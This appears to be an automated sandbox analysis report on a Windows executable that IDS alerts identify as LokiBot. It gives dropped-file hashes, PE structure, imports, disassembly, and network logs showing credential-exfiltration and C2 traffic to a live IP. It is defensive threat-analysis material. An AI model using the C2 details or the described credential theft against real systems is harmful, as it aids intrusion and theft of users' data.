                              Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

                              C:\Users\user\AppData\Local\Temp\subpredication

                              Download File
                              Process:C:\Users\user\Desktop\TXzf0xX2uq.exe
                              File Type:ASCII text, with very long lines (28674), with no line terminators
                              Category:dropped
                              Size (bytes):28674
                              Entropy (8bit):3.5739687292641804
                              Encrypted:false
                              SSDEEP:768:G3i/rgPZ9HVfX5tOCnUBwp5J96buL42l1lfn01uLphM:UiTgPZ9BptOvPuLDM
                              MD5:E8460A920A8E893E9948A6084B068DFF
                              SHA1:4884F912E733FF1E43C3DC3EDE3AD624FA945E2E
                              SHA-256:7C4397D6CDD052B3CF32E199C7E6A872DAFA27BD667E0F2BFC8D09DA122C3C7F
                              SHA-512:C2EAEBC4E069317B12939F61C1B8AC111449E24D142E3295120E28B9270D85595B154E632577256BE1BA4310A290713ED7137E4D41EFA5193FCC5F0A5428111F
                              Malicious:false
                              Reputation:low
                              Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

                              C:\Users\user\AppData\Roaming\188E93\31437F.lck

                              Download File
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1

                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

                              Download File
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):47
                              Entropy (8bit):1.168829563685559
                              Encrypted:false
                              SSDEEP:3:/lSll2DQi:AoMi
                              MD5:DAB633BEBCCE13575989DCFA4E2203D6
                              SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                              SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                              SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:........................................user.

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.84243984612773
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:TXzf0xX2uq.exe
                              File size:963'584 bytes
                              MD5:d6cbda717ae7addf9b583718998ae15a
                              SHA1:cbd764261f18b1b88de0c6af3ac08cc7642621a1
                              SHA256:5cb3d5d5e66657ffe6aa4b6819b8f885364a801c01353369f2fbc37a81d250ce
                              SHA512:4ec9698a8940bcb7ff73001cb8295e10f8496095e85672b2bbc8cf17ded28e0ff467d0dd9a6df8690fcbd18bc3b7b8108ec3e4e83ad5e35c11b4c664bc729f2c
                              SSDEEP:24576:+u6J33O0c+JY5UZ+XC0kGso6FaOA9aMrz0WY:Qu0c++OCvkGs9FaOA8iY
                              TLSH:5F25AE2273DDC360CB669173BF69B7016EBF3C614630B95B2F880D7DA950162262D7A3
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                              File Icon

                              Icon Hash:aaf3e3e3938382a0

                              Static PE Info

                              General

                              Entrypoint:0x427dcd
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67BE6AF9 [Wed Feb 26 01:14:33 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:afcdf79be1557326c854b6e20cb900a7

                              Entrypoint Preview

                              Instruction
                              call 00007FAE48DDE97Ah
                              jmp 00007FAE48DD1744h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push edi
                              push esi
                              mov esi, dword ptr [esp+10h]
                              mov ecx, dword ptr [esp+14h]
                              mov edi, dword ptr [esp+0Ch]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007FAE48DD18CAh
                              cmp edi, eax
                              jc 00007FAE48DD1C2Eh
                              bt dword ptr [004C31FCh], 01h
                              jnc 00007FAE48DD18C9h
                              rep movsb
                              jmp 00007FAE48DD1BDCh
                              cmp ecx, 00000080h
                              jc 00007FAE48DD1A94h
                              mov eax, edi
                              xor eax, esi
                              test eax, 0000000Fh
                              jne 00007FAE48DD18D0h
                              bt dword ptr [004BE324h], 01h
                              jc 00007FAE48DD1DA0h
                              bt dword ptr [004C31FCh], 00000000h
                              jnc 00007FAE48DD1A6Dh
                              test edi, 00000003h
                              jne 00007FAE48DD1A7Eh
                              test esi, 00000003h
                              jne 00007FAE48DD1A5Dh
                              bt edi, 02h
                              jnc 00007FAE48DD18CFh
                              mov eax, dword ptr [esi]
                              sub ecx, 04h
                              lea esi, dword ptr [esi+04h]
                              mov dword ptr [edi], eax
                              lea edi, dword ptr [edi+04h]
                              bt edi, 03h
                              jnc 00007FAE48DD18D3h
                              movq xmm1, qword ptr [esi]
                              sub ecx, 08h
                              lea esi, dword ptr [esi+08h]
                              movq qword ptr [edi], xmm1
                              lea edi, dword ptr [edi+08h]
                              test esi, 00000007h
                              je 00007FAE48DD1925h
                              bt esi, 03h
                              jnc 00007FAE48DD1978h

                              Rich Headers

                              Programming Language:
                              • [ASM] VS2013 build 21005
                              • [ C ] VS2013 build 21005
                              • [C++] VS2013 build 21005
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2013 UPD4 build 31101
                              • [RES] VS2013 build 21005
                              • [LNK] VS2013 UPD4 build 31101

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x22b1c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000x711c.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xc70000x22b1c0x22c001135182a76ab98a489512d37fb0b6587False0.8104976955935251data7.566458427321727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xea0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0xcf7b80x19de2data1.0003869603790325
                              RT_GROUP_ICON0xe959c0x76dataEnglishGreat Britain0.6610169491525424
                              RT_GROUP_ICON0xe96140x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0xe96280x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0xe963c0x14dataEnglishGreat Britain1.25
                              RT_VERSION0xe96500xdcdataEnglishGreat Britain0.6181818181818182
                              RT_MANIFEST0xe972c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                              Imports

                              DLLImport
                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                              Version Infos

                              DescriptionData
                              Translation0x0809 0x04b0

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2025-03-11T01:19:32.642770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549708104.21.64.180TCP
                              2025-03-11T01:19:32.642770+01002025381ET MALWARE LokiBot Checkin1192.168.2.549708104.21.64.180TCP
                              2025-03-11T01:19:32.642770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549708104.21.64.180TCP
                              2025-03-11T01:19:33.394575+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549708104.21.64.180TCP
                              2025-03-11T01:19:33.564117+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549709104.21.64.180TCP
                              2025-03-11T01:19:33.564117+01002025381ET MALWARE LokiBot Checkin1192.168.2.549709104.21.64.180TCP
                              2025-03-11T01:19:33.564117+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549709104.21.64.180TCP
                              2025-03-11T01:19:34.334309+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549709104.21.64.180TCP
                              2025-03-11T01:19:34.413798+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549710104.21.64.180TCP
                              2025-03-11T01:19:34.413798+01002025381ET MALWARE LokiBot Checkin1192.168.2.549710104.21.64.180TCP
                              2025-03-11T01:19:34.413798+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549710104.21.64.180TCP
                              2025-03-11T01:19:35.168422+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549710104.21.64.180TCP
                              2025-03-11T01:19:35.168422+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549710104.21.64.180TCP
                              2025-03-11T01:19:35.808325+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549711104.21.64.180TCP
                              2025-03-11T01:19:35.808325+01002025381ET MALWARE LokiBot Checkin1192.168.2.549711104.21.64.180TCP
                              2025-03-11T01:19:35.808325+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549711104.21.64.180TCP
                              2025-03-11T01:19:36.510599+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549711104.21.64.180TCP
                              2025-03-11T01:19:36.510599+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549711104.21.64.180TCP
                              2025-03-11T01:19:36.839406+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549712104.21.64.180TCP
                              2025-03-11T01:19:36.839406+01002025381ET MALWARE LokiBot Checkin1192.168.2.549712104.21.64.180TCP
                              2025-03-11T01:19:36.839406+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549712104.21.64.180TCP
                              2025-03-11T01:19:37.583171+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549712104.21.64.180TCP
                              2025-03-11T01:19:37.583171+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549712104.21.64.180TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 11, 2025 01:19:32.630562067 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:32.635386944 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:32.635454893 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:32.637934923 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:32.642708063 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:32.642770052 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:32.647589922 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.394264936 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.394575119 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.394685030 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.394728899 CET4970880192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.399353981 CET8049708104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.552076101 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.556957006 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.559210062 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.559210062 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.564045906 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:33.564116955 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:33.568926096 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.334078074 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.334309101 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:34.337446928 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.337549925 CET4970980192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:34.339102983 CET8049709104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.399790049 CET4971080192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:34.405103922 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.407109976 CET4971080192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:34.408930063 CET4971080192.168.2.5104.21.64.1
